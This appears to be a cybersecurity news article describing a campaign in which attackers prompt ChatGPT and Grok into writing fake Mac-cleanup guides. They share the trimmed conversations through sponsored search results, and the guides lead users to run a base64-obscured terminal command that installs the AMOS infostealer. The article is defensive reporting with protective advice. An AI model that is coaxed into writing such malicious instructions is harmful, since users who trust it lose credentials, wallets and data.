Cybercriminals are flooding search results with manipulated ChatGPT or Grok answers. Users trying to clean their Macs or free up space end up installing powerful infostealer malware.
Security researchers are raising alarms about a new malware delivery campaign: shared manipulated AI-generated tech tips. Attackers buy sponsored results on Google to appear in the search results page for a typo.
The links lead to ChatGPT or Grok conversations with guides, which resemble genuine tips to resolve the user’s problem. For example, if the user searched how to “clear system data on iMac,” the first search result would suggest a ChatGPT conversation containing fake guidance.
“Two highly ranked results appeared near the top of the page,” reported researchers at Huntress, a cybersecurity firm.
One of the Google search results to this specific query led to a ChatGPT conversation titled “How to delete system data on Mac – How to clear storage on Mac?” Another sponsored result was a Grok conversation “How to clear storage on Mac? – Guide Clear Space – Clear space safely."
If the user follows the advice on the legitimate platform, they will get infected with Atomic macOS Stealer (AMOS), a powerful infostealing malware.
The researchers identified multiple other variations of malicious instructions hosted on Grok and ChatGPT – all of which instruct users to run various versions of a command on the terminal that fetches and executes malware on their systems.
This attack vector is a variation of the ClickFix social engineering technique, which exploits user impulses to resolve minor technical issues and trick them into installing malware themselves.
How does this attack work?
Hackers base the whole chain of attack on legitimate vendors, and this social engineering attack is indistinguishable from the legitimate help it impersonates.
“No warnings. No downloads. No red flags. The entire infection chain appears to be normal and safe behavior, because it is in every other context. Users aren’t being careless. They're not ignoring security prompts,” Huntress researchers said.
“They're following instructions from a trusted AI platform, delivered through a search engine they use daily, for a task that legitimately requires Terminal access.”
First, hackers trick ChatGPT into generating a malicious step-by-step guide for cleaning a computer, installing an app or a feature, or resolving any other issue that users frequently encounter.
Cybercriminals use the “prompt engineering” technique to trick the chatbot into generating a fake guide with their malicious instructions. Hackers then clean up the conversation to remove lengthy back-and-forth and other signs of manipulation, making the guide appear concise and tidy.
“Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there,” Malwarebytes explains in its blog post.
Chatbots also have sharing features, so hackers simply create links to these manipulated conversations. They pay for sponsored search results and employ other SEO poisoning techniques to ensure their posts appear high in search results.
The base64-encoded string in the ChatGPT-provided terminal command conceals the attacker-controlled website address hosting the malicious script.
“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning,” Huntress researchers explain.
When a Mac user pastes commands into the terminal, they will bypass Gatekeeper, a built-in protection that normally blocks malicious code from running.
According to Trend Micro researchers, AMOS infostealer is capable of stealing credentials, browser data, cryptocurrency wallets, Telegram chats, VPN profiles, keychain items, Apple Notes, and files from common folders.
“For business, this creates downstream risks, such as credential stuffing, financial theft, or further intrusions into enterprise systems,” Trend Micro said.
How to protect yourself?
An adblocker would prevent users from seeing the sponsored search results in the first place. If you don’t use it, don’t click on sponsored search results,
“We have seen so many cases where sponsored results lead to malware that we recommend skipping them or making sure you never see them,” Malwarebytes said.
If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
Another piece of advice is to never run copy-pasted terminal commands from random pages or forums, if you don’t understand their contents, and especially when they’re intentionally concealed, such as by using base64 encoding.
Researchers also suggest using strong endpoint protection software. However, this might not be enough.
“The most dangerous exploits don't target code; they target behavior and people,” Huntress concluded.
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked